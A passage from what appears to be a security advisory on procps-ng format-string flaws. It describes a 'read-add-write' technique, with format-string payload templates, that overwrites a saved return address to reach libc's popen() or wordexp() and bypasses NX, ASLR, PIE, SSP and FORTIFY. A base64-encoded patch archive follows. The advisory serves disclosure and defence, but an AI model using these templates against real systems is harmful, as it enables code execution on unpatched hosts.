https://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-advancing-exploitation.html
("Trick #6: co-opting an addition primitive") with format-strings only.
With the first format-string:
- we "read" the LSW (Least Significant Word, 32 bits) of a stack pointer
that is located on the stack itself and hence accessible through the
format-string arguments -- for example, the argv pointer;
- we "add" a distribution-specific constant to this LSW, to make it
point to a saved RIP on the stack -- for example, the saved RIP pushed
onto the stack by the call to printf_positional() in vfprintf();
- we "write" this modified LSW to the LSW of another stack pointer that
is also located on the stack itself and hence accessible through the
format-string arguments -- for example, the argv[0] pointer.
With the second format-string:
- we "read" the LSW of a libc pointer that is located on the stack and
hence accessible through the format-string arguments -- for example,
the pointer to __libc_start_main();
- we "add" a distribution-specific constant to this LSW, to make it
point to a useful libc gadget -- for example, popen() or wordexp();
- we "write" this modified LSW to the LSW of a saved RIP on the stack:
we use the pointer (to the saved RIP) created on the stack by the
first format-string.
To implement the "read-add-write" primitive:
- we "read" the LSW of a pointer (we load it into vfprintf's internal
character counter) through a variable-width specifier such as "%*R$x",
where R is the position (among the format-string arguments on the
stack) of the to-be-read pointer;
- we "add" a constant A to this LSW through a constant-width specifier
such as "%Ax";
- we "write" this modified LSW to the LSW of another pointer through a
specifier such as "%W$n", where W is the position (among the format-
string arguments on the stack) of a pointer to the to-be-overwritten
pointer (for example, in our first format-string we overwrite the LSW
of the argv[0] pointer through the argv pointer, and in our second
format-string we overwrite the LSW of a saved RIP through the
overwritten argv[0] pointer); in summary:
. if we want to "add" a constant to the LSW that we "read", we use a
simple format-string such as "%*R$x%Ax%W$n", where A is equal to the
constant that we want to add;
. if we want to "subtract" a constant from the LSW that we "read", we
use a format-string such as "%*R$x%W$n%Ax%W$hn", where A is equal to
65536 minus the constant that we want to subtract (the smaller the
constant, the higher the probability of success).
This generic technique defeats NX, ASLR, PIE, SSP, and FORTIFY, but it
suffers from three major drawbacks:
- it requires two different format-strings, because it must reset
vfprintf's internal character counter between the two "read-add-write"
primitives;
- its probability of success is 1/4 (not a one-shot, but not a
brute-force either), because the probability of success of each
"read-add-write" primitive is 1/2 (the randomized LSW that is "read"
as an "int width" must be positive), and the stack is randomized
independently of the libc;
- it outputs 2*1GB on average (2*2GB at most): this may be acceptable if
the target utility is executed by a script or daemon, but not if it is
executed manually by an administrator (terminal escape sequences may
be used to overcome this drawback, but we did not explore this
possibility yet).
It is also possible to implement distribution-specific variants of this
generic technique: for example, we developed a Debian-specific version
of our "w" exploit that requires only one format-string, has an 11/12
probability of success (nearly one-shot), and outputs only a few
kilobytes. This is left as an exercise for the interested reader.
========================================================================
Acknowledgments
========================================================================
We thank Craig Small and the members of linux-distros@openwall and
security@kernel.
========================================================================
Patches.tar.gz.b64
========================================================================
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
